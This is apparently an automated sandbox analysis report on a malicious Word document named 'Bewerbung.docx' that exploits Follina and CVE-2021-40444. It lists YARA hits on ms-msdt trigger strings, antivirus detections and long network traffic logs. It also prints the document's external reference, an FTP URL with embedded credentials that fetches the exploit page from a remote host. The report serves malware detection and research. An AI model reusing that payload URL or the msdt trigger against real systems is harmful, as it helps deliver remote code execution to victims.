Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Bewerbung.docx

Overview

General Information

Sample Name:Bewerbung.docx
Analysis ID:705530
MD5:e7521cc41970a93d81eb7db063563474
SHA1:668afe1cf1ff3a6b8b9f9b0ceaa81549944bffc2
SHA256:d28398402e0b64cfb6e1f8e28cc21584eddd159690c2dab80aafae9c79201ae0
Infos:

Detection

CVE-2021-40444, Follina CVE-2022-30190
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Detected CVE-2021-40444 exploit
Antivirus detection for dropped file
Contains an external reference to another file
Connects to many ports of the same IP (likely port scanning)
Yara signature match
Potential document exploit detected (unknown TCP traffic)
Detected TCP or UDP traffic on non-standard ports
Internet Provider seen in connection with other malware
Uses FTP

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 2212 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
document.xml.relsSUSP_Doc_WordXMLRels_May22Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitationTobias Michalski, Christian Burkard, Wojciech Cieslak
  • 0x39:$a1: <Relationships
  • 0x44f:$a2: TargetMode="External"
  • 0x3ec:$x1: .html!
SourceRuleDescriptionAuthorStrings
dump.pcapSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitationNasreddine Bencherchali, Christian Burkard
  • 0x299f:$a: PCWDiagnostic
  • 0x5c03:$a: PCWDiagnostic
  • 0x8dd0:$a: PCWDiagnostic
  • 0xb2fa:$a: PCWDiagnostic
  • 0x2993:$sa3: ms-msdt
  • 0x5bf7:$sa3: ms-msdt
  • 0x8dc4:$sa3: ms-msdt
  • 0xb2ee:$sa3: ms-msdt
  • 0x29f3:$sb3: IT_BrowseForFile=
  • 0x5c57:$sb3: IT_BrowseForFile=
  • 0x8e24:$sb3: IT_BrowseForFile=
  • 0xb34e:$sb3: IT_BrowseForFile=
dump.pcapEXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitationTobias Michalski, Christian Burkard
  • 0x2982:$re1: location.href = "ms-msdt:
  • 0x5be6:$re1: location.href = "ms-msdt:
  • 0x8db3:$re1: location.href = "ms-msdt:
  • 0xb2dd:$re1: location.href = "ms-msdt:
dump.pcapJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6245B5A3.htmlSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitationNasreddine Bencherchali, Christian Burkard
    • 0x179c:$a: PCWDiagnostic
    • 0x1790:$sa3: ms-msdt
    • 0x17f0:$sb3: IT_BrowseForFile=
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6245B5A3.htmlEXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitationTobias Michalski, Christian Burkard
    • 0x177f:$re1: location.href = "ms-msdt:
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6245B5A3.htmlJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].htmlSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitationNasreddine Bencherchali, Christian Burkard
      • 0x179c:$a: PCWDiagnostic
      • 0x1790:$sa3: ms-msdt
      • 0x17f0:$sb3: IT_BrowseForFile=
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].htmlEXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitationTobias Michalski, Christian Burkard
      • 0x177f:$re1: location.href = "ms-msdt:
      Click to see the 7 entries
      No Sigma rule has matched
      No Snort rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: Bewerbung.docxAvira: detected
      Source: Bewerbung.docxReversingLabs: Detection: 20%
      Source: Bewerbung.docxVirustotal: Detection: 9%Perma Link
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].htmlAvira: detection malicious, Label: JS/CVE-2022-30190.G
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3FD475AA.htmlAvira: detection malicious, Label: JS/CVE-2022-30190.G
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].htmlAvira: detection malicious, Label: JS/CVE-2022-30190.G
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6245B5A3.htmlAvira: detection malicious, Label: JS/CVE-2022-30190.G

      Exploits

      barindex
      Source: Yara matchFile source: dump.pcap, type: PCAP
      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6245B5A3.html, type: DROPPED
      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html, type: DROPPED
      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\smartscreen[1].html, type: DROPPED
      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3FD475AA.html, type: DROPPED
      Source: document.xml.relsExtracted files from sample: mhtml:ftp://epiz_32622638:9ptise0wwbczj@185.27.134.11/wwwwwwwwwwwwwwwwwwww/smartscreen.html!x-usc:ftp://epiz_32622638:9ptise0wwbczj@185.27.134.11/wwwwwwwwwwwwwwwwwwww/smartscreen.html
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
      Source: global trafficTCP traffic: 185.27.134.11:39352 -> 192.168.2.22:49175
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
      Source: global trafficTCP traffic: 185.27.134.11:39352 -> 192.168.2.22:49175
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
      Source: global trafficTCP traffic: 185.27.134.11:39352 -> 192.168.2.22:49175
      Source: global trafficTCP traffic: 185.27.134.11:39352 -> 192.168.2.22:49175
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
      Source: global trafficTCP traffic: 185.27.134.11:39352 -> 192.168.2.22:49175
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
      Source: global trafficTCP traffic: 185.27.134.11:39352 -> 192.168.2.22:49175
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
      Source: global trafficTCP traffic: 185.27.134.11:39352 -> 192.168.2.22:49175
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
      Source: global trafficTCP traffic: 185.27.134.11:39352 -> 192.168.2.22:49175
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 185.27.134.11:39352 -> 192.168.2.22:49175
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49177
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49177
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49177
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49177
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49177
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49177
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49177
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49177
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 185.27.134.11:21699
      Source: global trafficTCP traffic: 185.27.134.11:21699 -> 192.168.2.22:49178
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 185.27.134.11:21699
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
      Source: global trafficTCP traffic: 185.27.134.11:21699 -> 192.168.2.22:49178
      Source: global trafficTCP traffic: 185.27.134.11:21699 -> 192.168.2.22:49178
      Source: global trafficTCP traffic: 185.27.134.11:21699 -> 192.168.2.22:49178
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 185.27.134.11:21699
      Source: global trafficTCP traffic: 185.27.134.11:21699 -> 192.168.2.22:49178
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 185.27.134.11:21699
      Source: global trafficTCP traffic: 185.27.134.11:21699 -> 192.168.2.22:49178
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 185.27.134.11:21699
      Source: global trafficTCP traffic: 185.27.134.11:21699 -> 192.168.2.22:49178
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 185.27.134.11:21699
      Source: global trafficTCP traffic: 185.27.134.11:21699 -> 192.168.2.22:49178
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 185.27.134.11:21699
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 185.27.134.11:21699
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 185.27.134.11:21699
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 185.27.134.11:21699 -> 192.168.2.22:49178
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 185.27.134.11:47790
      Source: global trafficTCP traffic: 185.27.134.11:47790 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 185.27.134.11:47790
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
      Source: global trafficTCP traffic: 185.27.134.11:47790 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 185.27.134.11:47790 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 185.27.134.11:47790 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 185.27.134.11:47790 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 185.27.134.11:47790 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 185.27.134.11:47790 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 185.27.134.11:47790 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 185.27.134.11:47790
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 185.27.134.11:47790
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 185.27.134.11:47790
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 185.27.134.11:47790
      Source: global trafficTCP traffic: 185.27.134.11:47790 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 185.27.134.11:50652
      Source: global trafficTCP traffic: 185.27.134.11:50652 -> 192.168.2.22:49182
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 185.27.134.11:50652
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
      Source: global trafficTCP traffic: 185.27.134.11:50652 -> 192.168.2.22:49182
      Source: global trafficTCP traffic: 185.27.134.11:50652 -> 192.168.2.22:49182
      Source: global trafficTCP traffic: 185.27.134.11:50652 -> 192.168.2.22:49182
      Source: global trafficTCP traffic: 185.27.134.11:50652 -> 192.168.2.22:49182
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 185.27.134.11:50652 -> 192.168.2.22:49182
      Source: global trafficTCP traffic: 185.27.134.11:50652 -> 192.168.2.22:49182
      Source: global trafficTCP traffic: 185.27.134.11:50652 -> 192.168.2.22:49182
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 185.27.134.11:50652
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 185.27.134.11:50652
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 185.27.134.11:50652
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 185.27.134.11:50652
      Source: global trafficTCP traffic: 185.27.134.11:50652 -> 192.168.2.22:49182
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.27.134.11:21
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
      Source: global trafficTCP traffic: 185.27.134.11:21 -> 192.168.2.22:49174
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.27.134.11:21

      Networking

      barindex
      Source: global trafficTCP traffic: 185.27.134.11 ports 21699,39352,1,2,50652,47790,21
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 185.27.134.11:39352
      Source: Joe Sandbox ViewASN Name: WILDCARD-ASWildcardUKLimitedGB WILDCARD-ASWildcardUKLimitedGB
      Source: unknownFTP traffic detected: 185.27.134.11:21 -> 192.168.2.22:49173 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 434 of 6900 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 434 of 6900 allowed.220-Local time is now 09:04. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 434 of 6900 allowed.220-Local time is now 09:04. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 434 of 6900 allowed.220-Local time is now 09:04. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 60 seconds of inactivity.
      Source: unknownTCP traffic detected without corresponding DNS query: 185.27.134.11
      Source: unknownTCP traffic detected without corresponding DNS query: 185.27.134.11
      Source: unknownTCP traffic detected without corresponding DNS query: 185.27.134.11
      Source: unknownTCP traffic detected without corresponding DNS query: 185.27.134.11
      Source: unknownTCP traffic detected without corresponding DNS query: 185.27.134.11
      Source: unknownTCP traffic detected without corresponding DNS query: 185.27.134.11
      Source: unknownTCP traffic detected without corresponding DNS query: 185.27.134.11
      Source: unknownTCP traffic detected without corresponding DNS query: 185.27.134.11
      Source: unknownTCP traffic detected without corresponding DNS query: 185.27.134.11
      Source: unknownTCP traffic detected without corresponding DNS query: 185.27.134.11
      Source: unknownTCP traffic detected without corresponding DNS query: 185.27.134.11
      Source: unknownTCP traffic detected without corresponding DNS query: 185.27.134.11
      Source: unknownTCP traffic detected without corresponding DNS query: 185.27.134.11
      Source: unknownTCP traffic detected without corresponding DNS query: 185.27.134.11
      Source: unknownTCP traffic detected without corresponding DNS query: 185.27.134.11
      Source: unknownTCP traffic detected without corresponding DNS query: 185.27.134.11
      Source: unknownTCP traffic detected without corresponding DNS query: 185.27.134.11
      Source: unknownTCP traffic detected without corresponding DNS query: 185.27.134.11
      Source: unknownTCP traffic detected without corresponding DNS query: 185.27.134.11
      Source: unknownTCP traffic detected without corresponding DNS query: 185.27.134.11
      Source: unknownTCP traffic detected without corresponding DNS query: 185.27.134.11
      Source: unknownTCP traffic detected without corresponding DNS query: 185.27.134.11
      Source: unknownTCP traffic detected without corresponding DNS query: 185.27.134.11
      Source: unknownTCP traffic detected without corresponding DNS query: 185.27.134.11
      Source: unknownTCP traffic detected without corresponding DNS query: 185.27.134.11
      Source: unknownTCP traffic detected without corresponding DNS query: 185.27.134.11
      Source: unknownTCP traffic detected without corresponding DNS query: 185.27.134.11
      Source: unknownTCP traffic detected without corresponding DNS query: 185.27.134.11
      Source: unknownTCP traffic detected without corresponding DNS query: 185.27.134.11
      Source: unknownTCP traffic detected without corresponding DNS query: 185.27.134.11
      Source: unknownTCP traffic detected without corresponding DNS query: 185.27.134.11
      Source: unknownTCP traffic detected without corresponding DNS query: 185.27.134.11
      Source: unknownTCP traffic detected without corresponding DNS query: 185.27.134.11
      Source: unknownTCP traffic detected without corresponding DNS query: 185.27.134.11
      Source: unknownTCP traffic detected without corresponding DNS query: 185.27.134.11
      Source: unknownTCP traffic detected without corresponding DNS query: 185.27.134.11
      Source: unknownTCP traffic detected without corresponding DNS query: 185.27.134.11
      Source: unknownTCP traffic detected without corresponding DNS query: 185.27.134.11
      Source: unknownTCP traffic detected without corresponding DNS query: 185.27.134.11
      Source: unknownTCP traffic detected without corresponding DNS query: 185.27.134.11
      Source: unknownTCP traffic detected without corresponding DNS query: 185.27.134.11
      Source: unknownTCP traffic detected without corresponding DNS query: 185.27.134.11
      Source: unknownTCP traffic detected without corresponding DNS query: 185.27.134.11
      Source: unknownTCP traffic detected without corresponding DNS query: 185.27.134.11
      Source: unknownTCP traffic detected without corresponding DNS query: 185.27.134.11
      Source: unknownTCP traffic detected without corresponding DNS query: 185.27.134.11
      Source: unknownTCP traffic detected without corresponding DNS query: 185.27.134.11
      Source: unknownTCP traffic detected without corresponding DNS query: 185.27.134.11
      Source: unknownTCP traffic detected without corresponding DNS query: 185.27.134.11
      Source: unknownTCP traffic detected without corresponding DNS query: 185.27.134.11
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{22F15F1C-2D40-4586-81FC-738423AAB483}.tmpJump to behavior
